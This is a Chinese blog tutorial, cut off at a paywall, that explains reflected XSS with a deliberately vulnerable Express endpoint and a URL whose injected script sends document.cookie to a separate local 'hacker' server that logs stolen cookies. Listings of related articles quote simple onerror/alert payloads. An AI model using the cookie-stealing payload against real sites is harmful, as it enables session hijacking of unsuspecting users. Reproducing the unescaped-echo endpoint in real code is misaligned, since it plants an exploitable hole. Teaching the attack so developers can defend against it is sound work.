前端安全之XSS及CSRF

最新推荐文章于 2023-05-09 16:01:50 发布
最新推荐文章于 2023-05-09 16:01:50 发布
阅读量172 收藏
点赞数
文章标签: 前端 安全 xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/javagty6778/article/details/129376663
版权

1 XSS

  • XSS全称叫跨站脚本攻击(Cross Site Scripting),目的是把script脚本注入到网页中在浏览器执行该脚本
1.1 反射型
  • 用express写个简单的api
const express = require("express");
const app = express();
app.get("/article", function (req, res) {const { type } = req.query;res.send(`您查询的文章类型是:${type}`);//根据url中的type参数返回
});
app.listen(4000, () => {console.log("listening http://localhost:4000");
});
  • 正常情况是这样的,在URL中传递查询参数type,后台处理后返回结果
  • 但是如果在URL传入script脚本
  • 这时候后台把结果返回到浏览器时会执行这个脚本,这就成功注入了script脚本,完成了一次反射型XSS攻击
  • 能成功执行注入的script脚本那就可以干很多事了,比如下面这个链接,他会获取当前点击用户的cookie然后发送到黑客的服务器上
http://localhost:4000/article?type=%3Cscript%3Efetch(`http://localhost:4001/cookie?cookie=${document.cookie}`)%3C/script%3E 

const express = require("express");
const app = express();
const app2 = express();
app.get("/article", function (req, res) {const { type } = req.query;res.send(`您查询的文章类型是:${type}`);
});
app.listen(4000, () => {console.log("listening http://localhost:4000");
});
app2.get("/cookie", function (req, res) {const { cookie } = req.query;console.log(`盗取的cookie:${cookie}`);res.send();
});
app2.listen(4001, () => {console.log("黑客网站盗取cookie listening http://localhost:4001&#
最低0.47元/天 解锁文章
哈喽沃德er
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
前端安全:如何防止CSRF攻击?
02-24
在移动互联网时代,前端人员除了传统的XSSCSRF安全问题之外,又时常遭遇网络劫持、非法调用HybridAPI等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入CSP、Same-SiteCookies等新技术来增强安全...
TokenBasedUnsafe:一个展示XSSCSRF攻击的网站
05-14
使用JSON Web令牌(JWT)的基于令牌的用户身份验证。 使用RSA算法对JWT中的数据进行加密和解密。 后端是使用nodejs和expressjs构建的。 前端是使用带有React钩子的... Webiste演示了XSSCSRF攻击是如何发生的。
前端——XSS攻击初步认识
我是我
07-17 372
XSS攻击 1.什么是XSS攻击 1.1 定义 百度百科.XSS攻击通常指的是利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,也包括Java、Flash甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限如执行一些操作(劫持用户对话、插入恶意内容、重定向用户、使用恶意软件劫持用户浏览器、繁殖XSS蠕虫、修改路由配置信息等)、私密网页内容、会话和Cookie等各种内容。 1.2 原理 百度百
前端安全】JavaScript防XSS攻击
qq_43288091的博客
09-27 7853
1.攻击过程 1、攻击者通过评论表单提交将 <script>alert(‘aaa’)</script>提交到网站 2、网站后端对提交的评论数据不做任何操作,直接存储到数据库中 3、其他用户访问正常访问网站,并且需要请求网站的评论数据 4、网站后端会从数据库中取出数据,直接返回给用户 5、用户得到页面后,直接运行攻击者提交的代码,所有用户都会在网页中弹出aaa的弹窗 这种攻击...
前端XSS攻击的三种方式
甘焕的博客
11-25 5247
针对HTML的script标签特性,对前端页面可以采取如下3中脚本注入方式。1. 添加script元素在页面中直接创建script元素,然后利用textContent特性进行脚本执行,如下: var script = document.createElement('script'); script.textContent='alert(100)'; // 立刻就会在页面进行执
记一次xls文件上传导致的反射型XSS
weixin_44820552的博客
03-28 1107
跨站脚本攻击(XSS)是指Web程序代码中对⽤户提交的参数未做过滤或过滤不严,导致参数中的特殊字符破坏了HTML页⾯的原有逻辑,攻击者可以利⽤该漏洞执⾏恶意HTML/JS代码、构造蠕⾍、篡改页⾯实施钓鱼攻击、以及诱导⽤户再次登录,然后获取其登录凭证等。跨站脚本攻击分为反射型、存储型、Dom型。此次记录的是反射型跨站脚本。1.xss不能只关注web前端页面输入框2.文件上传点也可以尝试XSS,例如xls或PDF文件(PDF XSS可参考0x05。
若依框架html文件上传xss漏洞
最新发布
weixin_43267639的博客
05-09 1963
在若依框架内如果使用上传组件,前端会默认读取文件内容,如果文件格式是html,并且文件内容含有一些方法,如alert()等,就会直接运行可能对系统造成伤害,如果系统需要做安全测试,这属于一个储存型xss漏洞。
前端安全系列:如何防止XSS攻击?
02-25
在移动互联网时代,前端人员除了传统的XSSCSRF安全问题之外,又时常遭遇网络劫持、非法调用HybridAPI等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入CSP、Same-SiteCookies等新技术来增强安全...
网络安全原理与应用:跨站请求伪造CSRF简介.pptx
05-16
CSRF攻击与跨站脚本(XSS)不同,XSS主要针对的是站点内部的信任用户,而CSRF则通过伪装成这些信任用户向受信任的网站发送恶意请求。由于CSRF攻击不易被检测和防范,它被认为比XSS更为危险。 攻击原理如下: 1. ...
浅谈XSSCSRF
Galaxy_0的博客
02-16 204
浅谈XSSCSRF
文件上传攻击骚操作
qq_50854662的博客
02-21 6485
文件上传攻击骚操作
前端页面JS注入问题,前端XSS安全问题解决办法
热门推荐
41981DC的博客
09-24 3万+
在页面中增加 JS 校验,对特殊符号进行替换,防止用户输入恶意代码导致 JS 注入问题。 在 web 开发中,对用户输入的内容做校验是必不可少的环节,不管是通过正则表达式对用户的输入进行校验,还是通过对特殊符号进行转义,均可达到目的。通过正则表达式校验,可能会导致用户体验差一点(因为用户不能自由输入~~),本文通过对 特殊符号进行转义 的方法来演示。 示例 自定义添加角色,包括角色名称、角色...
Ueditor的XML文件上传导致存储型XSS(可以再试试xxe)和ssrf漏洞
weixin_50464560的博客
05-16 7634
UEditor 富文本web编辑器最新漏洞版XML文件上传导致存储型XSS - 『原创发布区』 - 大神论坛 |脱壳破解|易语言|病毒分析|www.dslt.tech 一、Ueditor最新版XML文件上传导致存储型XSS 测试版本:php版v1.4.3.3 下载地址:https://github.com/fex-team/ueditor复现步骤: 1.上传一个图片文件 2.然后buprsuit抓包拦截 3.将uploadimage类型改为uploadfile,并修改文件后...
文件上传xss
weixin_50446974的博客
05-22 2839
我们平时在拿webshell的时候 最为常见的就是找到上传点进行文件上传 一句话木马或者说是用图片马 然后用websell管理工具进行连接(菜刀,蚁剑等等) 当然拿webshell的方式方法有许多 我这里以文件上传为例,好吧 通常一般的网站,都是以白名单,因为白名单比黑名单更加安全。这是肯定的。但是不乏有以黑名单的网站 这个不是绝对的,这是相对的 在目标网站后台文件上传点,假如说是以黑名单的方式 除了我们知道的绕过方式 像前端进行校验,我们通过burp进行抓包改后缀名.还可以通过文件.
XSS,文件上传,文件包含】
一纸荒芜的博客
07-31 2621
网络安全面试题
通过文件上传XSS
黑剑
09-19 799
我们可以在标准配置的 Jetty 服务器上实现 XSS,不仅可以上传众所周知的 .html 或 .svg 文件,还可以上传其他扩展名不太流行的文件。
XSS姿势——文件上传XSS
haha1314的博客
04-22 3749
XSS姿势——文件上传XSS 文件上传xss,一般都是上传html文件导致存储或者反射xss,一般文件内容都是html。 1、把以下代码写入文件,后缀改成图片格式。 <html> <body> <img src=1 onerror=alert(1)> </body> </html> 2、或者将后缀名改为htm...
文件上传XSS引发的安全问题
weixin_30257433的博客
04-26 1075
  文件上传xss,一般都是上传html文件导致存储或者反射xss   一般后缀是html,之前疏忽了,没怎么考虑文件上传xss   如果没有 验证文件内容,却验证了后缀的情况下,使用:   htm后缀:   测试代码:     <html> <body> <img src=1 onerror=alert(1)> ...
web前端安全之form表单提交前加校验_防止xss攻击
Mr_CZL的博客
07-02 8222
如果还不知道xss的话,网上有好多文章解释。xss的攻击种类很多。作为一名前端小白,本文只从前端常用实用的角度简单写了一下。这类场景就是form表单的提交。为防止xss攻击,表单的每个字段提交需要做校验或者编码。校验的话先不说,网上很多正则,比如校验手机号或者邮箱之类的。重点说的就是编码。提交前需要对提交的内容进行编码,防止特殊的标签之类的提交到后台。比如&lt;script&gt;alert('...
Web前端安全XSSCSRF深度剖析
理解何时及如何设置、读取、修改和删除cookie是前端安全的关键。需要注意的是,敏感信息不应存储在cookie中,且应启用HTTP Only标志,防止JavaScript访问cookie,以减少XSS攻击的风险。 在实践中,前端开发者应时刻...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值